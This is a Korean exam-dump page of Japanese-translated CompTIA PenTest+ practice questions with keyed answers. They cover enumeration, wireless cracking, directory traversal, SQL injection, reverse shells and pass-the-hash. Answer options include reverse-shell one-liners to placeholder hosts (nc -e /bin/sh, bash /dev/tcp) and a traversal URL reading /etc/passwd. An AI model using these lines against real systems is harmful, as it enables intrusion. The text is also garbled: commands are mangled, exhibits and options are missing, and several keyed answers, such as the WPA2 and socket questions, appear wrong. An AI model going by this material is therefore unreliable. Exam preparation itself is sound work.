최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

문제1

クライアントへの侵入テストの販売価格を計算するとき、理解するのに最も重要な側面は次のうちどれですか？

A. 秘密保持契約

B. 必要な作業範囲

C. クライアントの予算

D. 運用コスト

정답: B

문제2

enum4linuxを使用してActiveDirectoryドメインコントローラー上のユーザーを正常に列挙した後、侵入テスターはパスワード推測攻撃を実行したいと考えています。以下の出力が与えられます。

攻撃を行う前に、上記の出力からユーザー名を抽出するために使用できるのは次のうちどれですか？

A. grep -i rid v <enura.41inux_output。txt '| cut -d：-S2 i cut -d] -f1>ユーザー名。txt

B. grep user enuza41inux_output.txt I awk '{print $ 1}' | cut -d [-S2 I cut -d] -f1> username.txt

C. cat enum41inux_output.txt> grep -v user I sed's / \ [// 'I sed's / \] //' 2> usernames.txt

D. cut -d：-f2 enum41inux_output.txt | awk '{print S2}'私は-dをカットしました：-f1> usernaraes.txt

정답: B

문제3

ペネトレーションテスターがワイヤレスペネトレーションテストを実行しています。ペネトレーションテスターがWPA2で保護されたアクセスポイントに簡単かつ迅速にアクセスできる可能性がある脆弱性は次のうちどれですか。

A. アクセスポイントに対する認証解除攻撃により、暗号化されたパスワードを取得して解読するために使用できる4方向ハンドシェイクをキャプチャする機会が得られる可能性があります。

B. カスタマイズされたARPパケットを挿入すると、多くの初期化ベクトルをすばやく生成できるため、パスワードの解読が速くなり、WPA2で保護されたアクセスポイントへの接続に使用できます。

C. WEPの実装が弱いと、ピン番号をすばやく推測できます。これを使用してパスワードを取得し、WEPで保護されたアクセスポイントに接続することができます。

D. レインボーテーブルには、可能なすべてのパスワードの組み合わせが含まれています。これを使用して、ブルートフォースパスワード攻撃を実行し、パスワードを取得して、WPA2で保護されたパスワードに接続することができます。

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제4

次のツールのうち、Webサイトの構成の基本的なリモート脆弱性スキャンを実行するために使用できるのはどれですか？

A. BeEF

B. ミミカッツ

C. パター

D. 日東

정답: D

문제5

ペネトレーションテスターは、ブラウザのURLに次の情報を入力しました。
https://www.example.com/login.php?file=../../../../../../../etc/passwd
サーバーは、サーバーの機密データファイルに含まれているデータで応答しました。次のタイプの脆弱性のうち、最も悪用される可能性が高いのはどれですか？

A. ディレクトリトラバーサル

B. 競合状態

C. コマンドインジェクション

D. 弱い資格情報

정답: A

문제6

ペネトレーションテスターがbashスクリプトでソケットを開こうとしていますが、実行時にエラーが発生します。スクリプト内の関連する行の現在の状態は次のとおりです。

次のコード行のうち、置換時に問題を修正するのはどれですか？

A. open 3</dev/tcp/${HOST}/${PORT}

B. open 0<>/dev/tcp/${HOST}:${PORT}

C. open 3</dev/tcp/$[HOST]/$[PORT]

D. exec 0</dev/tcp/${HOST}/${PORT}

E. exec 0</dev/tcp/$[HOST]:$[PORT]

F. exec 3<>/dev/tcp/${HOST}/${PORT}

정답: E

문제7

ペネトレーションテスタは、ポート443を介して任意のホストに無制限のネットワークを持つシステムを危険にさらします。侵入テスト担当者は、被害者から攻撃者に戻るためのリバースシェルを作成しようとしています。侵入テスト担当者は、次の方法のうちどれを使用するのが好きですか？

A. perl -e 'use SOCKET'; $ i = '<SOURCEIP>; $ p = 443;

B. nc -e / bin / sh <SOURCEIP> 443

C. bash -i>＆/ dev / tcp / <DESTINATIONIP> / 443 0>＆1

D. ssh superadmin @ <DESTINATIONIP> -p 443

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제8

組織の侵入テストを実行するために侵入テスターが雇われました。
次のうち、エラーベースのSQLインジェクション攻撃を示しているのはどれですか？

A. 1 = 1またはa--

B. 1 = 1または2--

C. a = 1または1 ---

D. 1 = 1またはb--

정답: C

문제9

セキュリティコンサルタントが、範囲内のいずれかのVLANにSCADAデバイスを見つけました。次の行動のどれが最もデバイスに対して潜在的に有害な結果を生み出すでしょうか？

A. デバイスに対してDNSキャッシュポイズニング攻撃を開始します。

B. デバイスに対してNessusの脆弱性スキャンを実行します。

C. デバイスに対してSMBエクスプロイトを開始します。

D. デバイスに対してSNMPパスワード総当たり攻撃を開始します。

정답: D

문제10

ペネトレーションテスターのジョーは、ファイアウォールの背後にあるWebアプリケーションを悪用できました。彼はリバースシェルを自分のマシンに戻そうとしていますが、ファイアウォールは、セキュリティコンサルタントが最も高いチャンスを得るために使用する必要がある発信トラフィックポートをブロックします。ファイアウォールをバイパスするには？

A. HTTP

B. FTP

C. SMTP

D. DNS

정답: D

문제11

ファイルにはいくつかのハッシュが含まれています。パスザハッシュ攻撃で使用できるのは次のうちどれですか？

정답: D

문제12

侵入テスターは、Windowsホストの悪用に成功し、ハッシュをダンプします。侵入テスターは、次のどのハッシュを使用してパススルーハッシュ攻撃を実行できますか？
A）

B）

C）

D）

A. オプションB

B. オプションA

C. オプションC

D. オプションD

정답: D

문제13

攻撃者はモバイルアプリケーションに対してMITM攻撃を実行しました。攻撃者は、プロキシツールを介してアプリケーションのネットワークトラフィックを操作しようとしています。攻撃者は、限られたトラフィックのみをクリアテキストと見なします。アプリケーションログファイルは、安全なSSL / TLS接続が失敗していることを示しています。
次のうち、すべてのトラフィックのプロキシを妨げる可能性が最も高いのはどれですか？

A. 閉じたポート

B. 強力な暗号スイート

C. 証明書のピン留め

D. 誤って構成されたルート

정답: C

최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

우리와 연락하기

유용한 링크

최신 업데이트